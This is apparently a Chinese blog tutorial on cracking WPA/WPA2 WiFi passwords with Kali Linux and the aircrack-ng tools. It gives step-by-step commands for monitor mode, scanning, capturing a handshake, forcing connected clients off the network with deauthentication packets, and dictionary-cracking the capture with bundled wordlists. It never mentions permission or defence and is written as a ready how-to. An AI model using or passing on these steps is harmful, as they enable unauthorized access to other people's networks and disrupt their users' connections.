破解WIFI教程
KING-TING 人气:2
# 今日主题:如何破解WIFI
### 准备工具
>- 笔记本一台
>- usb无线网卡【我用的是小米的】
>- kali系统【可以在虚拟机里装,建议用2019年及以下版本】
### VMware Workstation15虚拟机安装
可以参考`https://www.jianshu.com/p/552179808ebf`
### kali安装
可以参考`https://www.cnblogs.com/changjue/p/11244585.html`
### WIFI加密方式
`1. WEP(有线等效加密)——采用WEP64位或者128位数据加密。`
`2.WPA-PSK[TKIP]———采用预共享秘钥的WI-FI保护访问,采用WPA-PSK标准加密技术,加密类型为TKIP。`
`3.WPA-PSK[TKIP]+WPA2-PSK[AES]———允许客户端使用WPA-PSK[TKIP]或者WPA2-PSK[AES]。`
## 一
打开`虚拟机`,插入`usb网卡`,把`网卡`放到`虚拟机`来
![](https://imgkr.cn-bj.ufileos.com/596aea72-ae8f-45af-927b-c376a2129da2.png)
桌面`右键`,选择`Open in Terminal`打开终端
![](https://imgkr.cn-bj.ufileos.com/349320fe-9b26-495e-96cc-50017398e622.png)
## 二
显示网卡信息
airmon-ng
![](https://imgkr.cn-bj.ufileos.com/39dbeaae-0cd4-4338-a56a-8e39a9e5909f.png)
开启网卡监控
airmon-ng start wlan0
![](https://imgkr.cn-bj.ufileos.com/f7e25a5f-a597-45bf-ae46-2384990945a5.png)
用ifconfig命令查看一下网卡信息
ifconfig
可以看到网卡的名字已经变了
![](https://imgkr.cn-bj.ufileos.com/68d1c08c-2731-408d-8356-22954bd260ed.png)
## 三
扫描WIFI信号
airodump-ng wlan0mon
![](https://imgkr.cn-bj.ufileos.com/0c4fa4df-f8cd-4d83-8e50-1fb4ad697cd8.png)
拿到握手包
airodump-ng -w freedom -c 11 -–bssid 44:97:5A:F2:9E:B0 wlan0mon --ignore-negative-one
解释:
` -c:指定信道[ch]`
` -w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字`
` --bssid:指定路由器的MAC`
![](https://imgkr.cn-bj.ufileos.com/ba54631f-b704-4b50-809e-ded00af3dee9.png)
再开一个终端输入命令
aireplay-ng -0 10 -a 路由器MAC -c 客户机MAC wlan0mon – -ignore-negative-one
使用airplay-ng工具强制断开已经连接到wifi的设备重新连接路由器,来进行抓去数据包
解释:
`-0:指定发送反认证包的个数(阿利伯数字0)`
`-a:指定路由器的MAC`
` -c:指定客户机的MAC`
![](https://imgkr.cn-bj.ufileos.com/4579048f-b254-46b2-a961-4d56f0d18fe1.png)
出现下图就是抓取成功
![](https://imgkr.cn-bj.ufileos.com/e6de89cd-ae66-4576-b3d5-9b66f09c5263.png)
破解握手包
aircrack-ng -w dict freedom-*.cap
`dict:字典的名字`
` freedom-*.cap:握手包`
破解成功
![](https://imgkr.cn-bj.ufileos.com/ad44780b-9e89-4280-9f20-da1220e620a4.png)
### 补充
- 系统自带了密码字典,我用的是我自己的
字典位置如下:
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists/rockyou.txt
最后一个路径下的文件默认是压缩的,可以通过以下命令解压
![](https://imgkr.cn-bj.ufileos.com/fc7a1561-f12e-4df8-a84c-fe661b77bd33.png)
- 反向认证的原理是让其中一个客户端下线,然后他再次连接,就可以获取握手包
- 信号扫描结束或者进程终止:ctrl+c
---
加载全部内容